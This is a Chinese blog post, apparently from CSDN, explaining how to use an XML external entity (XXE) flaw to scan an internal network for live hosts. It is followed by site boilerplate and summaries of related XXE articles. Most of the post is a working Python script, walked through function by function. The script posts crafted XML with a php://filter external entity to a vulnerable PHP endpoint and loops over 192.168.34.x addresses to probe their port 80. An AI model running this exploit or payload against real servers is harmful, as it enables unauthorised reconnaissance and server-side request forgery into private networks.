利用XXE进行内网主机探测

最新推荐文章于 2024-09-17 19:41:31 发布
最新推荐文章于 2024-09-17 19:41:31 发布
阅读量1.3k 收藏 1
点赞数 1
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41918771/article/details/103650895
版权

XXE漏洞大家也应该清楚了,不清楚可以看我的另两篇博客
https://blog.csdn.net/qq_41918771/article/details/103628721
https://blog.csdn.net/qq_41918771/article/details/103641745

内网主机探测

先上脚本

import requests

def build_xml(ip):
	xml  = "<?xml version='1.0' encoding='UTF-8'?>\n"
	xml += "<!DOCTYPE xml[\n"
	xml += "<!ENTITY int SYSTEM 'php://filter/convert.base64-encode/resource=http://%s/'>\n"%ip
	print(ip)
	xml += "]>\n"
	xml += "<xml>&int;</xml>"
	send_xml(xml)

def send_xml(data):
	x = requests.post("http://192.168.34.69/3.php",data=data,timeout=3).text
	print(x)

for i in range(65,70):
	try:
		ip = "192.168.34.%d"%i
		build_xml(ip)
	except:
		continue

这实际上也就是判断内网主机的80端口是否开启。开启了判断为存活。

首先我们构造了一个build_xml函数,这个函数的作用是构造一个post的参数。

def build_xml(ip):
	xml  = "<?xml version='1.0' encoding='UTF-8'?>\n"
	xml += "<!DOCTYPE xml[\n"
	xml += "<!ENTITY int SYSTEM 'php://filter/convert.base64-encode/resource=http://%s/'>\n"%ip
	print(ip)
	xml += "]>\n"
	xml += "<xml>&int;</xml>"
	send_xml(xml)

其次是send_xml函数,这个函数用来发送。并接收结果

def send_xml(data):
	x = requests.post("http://192.168.34.69/3.php",data=data,timeout=3).text
	print(x)

然后主函数做循环

for i in range(1,255):
	try:
		ip = "192.168.34.%d"%i
		build_xml(ip)
	except:
		continue

结果,方便演示,这里只探测了65到72的ip
在这里插入图片描述
成功在69获取到内容。
下面这句代码的意思是将http://ip/响应的内容进行base64编码。

php://filter/convert.base64-encode/resource=http://ip/'>

参考:https://xz.aliyun.com/t/3357#toc-11

Bog0n
关注
专栏目录
XXE漏洞利用技巧(XML注入):从XML到远程代码执行
墨痕诉清风的博客
10-12 4921
如今的 web 时代,是一个前后端分离的时代,有人说 MVC 就是前后端分离,但我觉得这种分离的并不彻底,后端还是要尝试去调用渲染类去控制前端的渲染,我所说的前后端分离是,后端 api 只负责接受约定好要传入的数据,然后经过一系列的黑盒运算,将得到结果以 json 格式返回给前端,前端只负责坐享其成,拿到数据json.decode 就行了(这里的后端可以是后台代码,也可以是外部的api 接口,这里的前端可以是传统意义的前端,也可以是后台代码)我们以存在 XXE 漏洞的服务器为我们探测内网的支点。...
(渗透学习)XXE漏洞原理 & 挖掘 & 利用 & 防御
yang1234567898的博客
01-15 5913
1、什么是XML? xml和html结构类似,不同的是: XML 被设计用来传输和存储数据。 HTML 被设计用来显示数据。 XML 文档结构包括 XML 声明、DTD 文档类型定义(可选)、文档元素 (1)什么是DTD? 文档类型定义(DTD)可定义合法的XML文档构建模块,它使用一系列合法的元素来定义文档的结构。 DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 ① 内部的 DOCTYPE 声明: <!DOCTYPE 根元素 [元素声明]> 如下就
XXE漏洞分析
jklbnm12的博客
09-17 465
0x01:知识准备 XXE即XML External Entity Injection,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml\\\_load默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml\\\_load_string() XML实体分为四种:字符实体,命名实体,外部实体,参数实体 1、命名实体写法: <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE
XXE漏洞-内网探测
小刚的博客
08-21 2363
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 XXE漏洞-内网探测XXE漏洞危害CTF案例 XXE漏洞 XXE :Xml External Entity 外部实体注入攻击 是利用一种xml的语言进行的注入攻击 XXE漏洞原理就不详解了,一搜一大把 危害 可以读取系统文件 获取源代码 进行SSRF 进行Phar触发反序列化 CTF案例 本文主要是针对一个CTF题https://buuoj.cn/challenges#[NCTF2019]Tr.
XXE探测内网端口 [NCTF2019]True XML cookbook
最新发布
weixin_73049307的博客
09-17 667
发现有回显点,之后就是开始构造代码,读取各种文件,这里可以用file://,php://等伪协议读取文件。根据长度来判断,应该是16,而且查到的ip后一段也是22,一般的都不是直接查到的。但还是不行,不过发现每次都会卡在11这里一会再出现完成的结果,盲猜一手12。(注意:这里的encodig="UTF-8"写不写都没关系,写了就是。/proc/net/arp 每个网络接口的arp表中dev包。很明显,还是504超时了,应该是找的文件不对。额,没有发现内网地址,换个文件试试。
XXE探测内网
Mssqj的博客
02-17 1050
内网通常指的是一个组织或企业内部的计算机网络,它连接了组织内部的计算机和设备,使得它们可以相互通信和共享资源。与互联网相对,内网是一个相对封闭和安全的网络环境。内网和外网在IP地址设置、覆盖范围、传输速率、安全性和连接方式等方面存在明显的区别。这些区别使得内网更加适合于组织或企业内部的使用,而外网则更适合于连接不同地区和国家之间的设备。通俗理解就是:内网就像一个大家庭或者一个公司的内部圈子,只有内部成员才能进入和互相交流。
XXE漏洞
一个安全路上的菜鸟
02-17 462
文章目录一、XML基础DTDDTD -实体二、XML外部实体注入(XML External Entity XEE)有回显读取本地敏感文件普通实体引用外部实体参数实体引用外部实体无回显读取本地的敏感文件利用三、总结参考链接 本文只是对XXE漏洞学习,参考多篇文章 一、XML基础 ​ XML 用于编辑电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据,是一种允许用户的对自己的标记语言进行定义...
WEB漏洞——XXE
qq_63594215的博客
04-12 989
本次文章主要介绍XXE漏洞的原理,利用以及防御的过程,另外还有介绍一点XML的基础知识,详情请见下文。a) xml,eXtensible Markup Language,可扩展标记语言,是一种标记语言,使用简单标记描述数据b) xml是一种非常灵活的语言,没有固定的标签,所有标签都可以自定义c) 通常,xml被用于信息的传递和记录,因此,xml经常被用于充当配置文件如果把HTML和XML进行对比的话,HTML进行对比的话,HTML旨在显示数据信息,而XML旨在用来进行数据的传输和存储。
刚开始学XXE漏洞,可以看看这个博客.md
05-05
刚开始学XXE漏洞的时候,很懵,看见了这个博客,就转载一下,希望对刚接触这个东西的同学有帮助,刚学的时候浪费了很多时间,希望别人可以少浪费这个找资源的时间
XXE漏洞解析演示
明哥哥知识分享
09-03 365
一. 源码 1. 有回显有报错测试代码 <?php $xml=simplexml_load_string($_GET['xml']); // print_r($xml); echo $xml ?> 2. 无回显无报错测试代码 <?php $xml=@simplexml_load_string($_POST['xml']); ?> 二. 内部实体演示 // &有问题,必须对&进行编码才可以 <!DOCTYPE foo [<!ELEMENT fo
WEB常见漏洞之XXE(靶场篇)
Javachichi的博客
11-10 769
其实在我们攻击具有XXE漏洞的服务器时,受攻击服务器进行了两次响应,如果查看受攻击的服务器上的日志会发现两条记录:一次是对XML进行解析后对另一台远程服务器的访问,一次是访问服务器自身上具有XXE漏洞的文件。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
iwebsec XXE漏洞
weixin_44135070的博客
01-22 789
使用POST方式提交数据,这里用到火狐的插件hackbar,首先点击load URL,再勾选post data按钮,将构造好的XML恶意代码放入post框内,点击Execute进行post数据。
Web安全 XXE漏洞的 测试和利用.(读取服务器的任何文件 和 收集服务器的内网信息.)
网络安全领域___专研者.
03-08 6611
XXE漏洞全称(XML External Entity Injection),即XML外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成:文件读取、命令执行、内网端口扫描、攻击内网网站,DOS攻击 等危害.(xxe漏洞触发的点往往是可以上传xml文件的位置的,没有对上传的xml文件进行过滤,导致可上传恶意xml文件.)
网络安全课第五节 XXE 漏洞的检测与防御
fegus的博客
07-11 1597
上一讲我们介绍了 SSRF 漏洞,一种专门针对服务端的请求伪造攻击,常被用于攻击内网。在里面我介绍了 Burp Collaborator 用于专门测试无回显漏洞的功能,在本讲的 XXE 漏洞测试中,我们依然可以使用,不知道你是否还记得怎么使用?下面,我们就开始今天的课程,一场关于 XML 外部实体注入(XXE)漏洞的攻防之路。XXE(XML External Entity,XML 外部实体注入)正是当允许引用外部实体时,通过构造恶意内容,导致读取任意文件、执行系统命令、内网探测与攻击等危害的一类漏洞。PHP
XXE详解
qq_48904485的博客
03-22 5569
一、XML基础知识 1、XML简介: XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 XML 和 HTML 为不同的目的而设计: XML 被设计用来传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。 2、XML 语法 1)XML 声明文件的可选部分,如果存在需要放在文
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bog0n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值